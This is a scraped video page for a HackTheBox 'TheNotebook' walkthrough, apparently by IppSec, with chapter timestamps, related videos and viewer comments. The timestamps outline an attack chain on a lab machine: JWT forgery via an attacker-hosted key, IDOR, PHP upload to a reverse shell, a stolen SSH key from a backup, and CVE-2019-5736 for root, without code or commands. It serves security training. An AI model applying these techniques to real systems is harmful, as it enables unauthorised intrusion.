HackTheBox - TheNotebook

preview_player
Показать описание
00:00 - Intro
00:50 - Start of nmap
02:40 - Checking out the webpage, trying to identify the language running the page
03:50 - Exploring how Add Note works and testing SSTI/SQL/XSS
06:30 - Checking out the cookie to see how the JWT is encoded
07:30 - JWT.IO shows the JWT is RS256 and there's a URL for the privKey
08:30 - Editing the PrivKEy, I'm not sure why i didn't do this within the JWT.IO website...
10:00 - Confirming the server goes to us to get the PrivateKey
10:45 - Using ssh-rsa/openssl to create a RSA Key and forging the JWT
14:55 - Exploring the IDOR Vulnerability to see if unauthenticated users can access notes
18:45 - Uploading a PHP File to confirm code execution then a reverse shell.
21:23 - Identifying when the box was created by looking at SSH Host Keys, then using find to list files created around that time
26:20 - My reverse shell keeps crashing, doing the finds without the PTY Trick to find a backup that has an SSH Key
30:50 - SSH into the box with the SSH Key and discovering we can use sudo to access Docker
31:40 - Exploring the docker for sensitive information that could be used to access other users on the box
34:25 - Looking at the Docker Version to see it from 2018 and finding a vulnerability
36:10 - Performing CVE-2019-5736 to get root
  1. IppSec
Рекомендации по теме
HackTheBox - TheNotebook 0:41:10

HackTheBox - TheNotebook

JWT & Docker 0:11:13

JWT & Docker CVE - TheNotebook @ HackTheBox

HackTheBox(HTB) - TheNotebook 0:23:05

HackTheBox(HTB) - TheNotebook Walkthrough

SSRF, arbitrary JWT 0:06:37

SSRF, arbitrary JWT validation & runc privilege escalation | TheNotebook @ HackTheBox

HackTheBox Meetup - 0:41:45

HackTheBox Meetup - Moncton:: TheNotebook walkthrough

Passo a Passo 0:21:56

Passo a Passo da Maquina The Notebook do HackTheBox

THE NOTEBOOK HACK 0:53:56

THE NOTEBOOK HACK THE BOX WALK THROUGH | TAMILCODE

Getting Access through 0:08:34

Getting Access through the Helpdesk - Delivery on HackTheBox

HackTheBox TheNotepad Walkthrough 0:17:05

HackTheBox TheNotepad Walkthrough - In Hindi

HackTheBox - Luanne 0:08:09

HackTheBox - Luanne

HTB TheNotebook [AR] 0:27:27

HTB TheNotebook [AR]

Resolución de la 1:04:26

Resolución de la máquina TheNotebook de HackTheBox

Drupalgeddon & Sudo 0:06:28

Drupalgeddon & Sudo Snap Install - Armageddon @ HackTheBox

HackTheBox - Laboratory 0:38:52

HackTheBox - Laboratory

How Hackers 'hack' 0:09:32

How Hackers 'hack' YOUR Password| HackTheBox - Intelligence | Part #3

BRAND NEW - 0:04:11

BRAND NEW - HacktheBox Faculty - Kickoff

Writeup TheNotebook - 0:31:58

Writeup TheNotebook - Hackthebox - Indonesia

HackTheBox - Laser 1:55:12

HackTheBox - Laser

Feline - Deserialization 0:32:39

Feline - Deserialization and Docker Socket Exploitation - HackTheBox

HackTheBox - Schooled 1:15:56

HackTheBox - Schooled

Cyber Security | 0:33:06

Cyber Security | Ethical Hacking | Pentesting Lab | Hackthebox | Doctor | Very Detailed

Command Injection, Prototype 0:18:21

Command Injection, Prototype Pollution & Kubernetes - Unobtainium @ HackTheBox

XSS, Tab Nabbing 0:30:53

XSS, Tab Nabbing & Rust Reversing - Developer @ HackTheBox

Hack The Box 0:34:16

Hack The Box Pathfinder Walkthrough

Комментарии
Автор

Man, the way you go through your boxes is kinda unique. Specifically the post-exploitation phase. Props as always

potatoonastick
Автор

Aww, "Java Web Token" was funny

daysling
Автор

Loved it! Even I overlooked the other enumeration holes that I left. I was looking forward to this video. Amazing. <3 Looking forward to making more submissions for the community!

mostwanted
Автор

Your method of forging keys was way easier than mine. I wrote a complete Python script that generated keys and gave me the cookie in base64 as output.

onlyastronut
Автор

love your videos, always learning from your guides - thanks

JuanBotes
Автор

Happy to see someone saying you name in right way. 👍🏻 ippsec

Iamnoahfranklin
Автор

Great Video. I have solved this box but i have used another method to get root. Found this one preety nice. Always looking forward for your videos to learn and grow. <3

infosec
Автор

Great video...❤️ But still waiting for Zap...😝 What happened??😏 You don't like it...??🤗

yamunaudayanthi
Автор

at 6:02 - If you right-click in the Inspector -> Edit as HTML, you'll see the encoding that you were expecting to see. Most browsers unencode it for readability, so I use that trick a lot.

ASoggySandal
Автор

Wondering if it's not showing up as html entity encoded in the inspector is due to that you may need to edit as html to see the pre-rendered output? Big fan and sponsor btw.

hontar
Автор

Great video! Big fan, hope to hug you someday

pzz
Автор

Hey do you have a discord or smth to interact with you and your community? Im like a beginner/intermediate in cybersecurity and would love to learn about new topics and interact with other people from the same field :)

Filmer
Автор

As new watcher, this was like magic, how do you copy and paste into vi??

BennyM
Автор

PLEASE... write up HTB "Under Construction" ... available material all much too ambiguous. THanks!

blackthorne-rose
Автор

I do not get how you directly changed the header and send it to the server, isn't that signature part is used to check if the token has been changed or not right?

aaryanbhagat
Автор

Sir, may I ask you why is your website under the .rocks domain? I misspelled your domain a couple of times, all of them: ipsec, ipsecc and ipssec seem to be some kind of malicious domain. Are you aware of that? Isn't there something you could do about it?

Cyberghst_
Автор

24:03 My shell died that's rude. 😂 😂 😂

maxxroach
Автор

No one would implement jwt verification this 😂

caseylgoodrich
Автор

How u got this machine i find i find on hack the box but i don't gat can u please tell me 🙏

mayurahir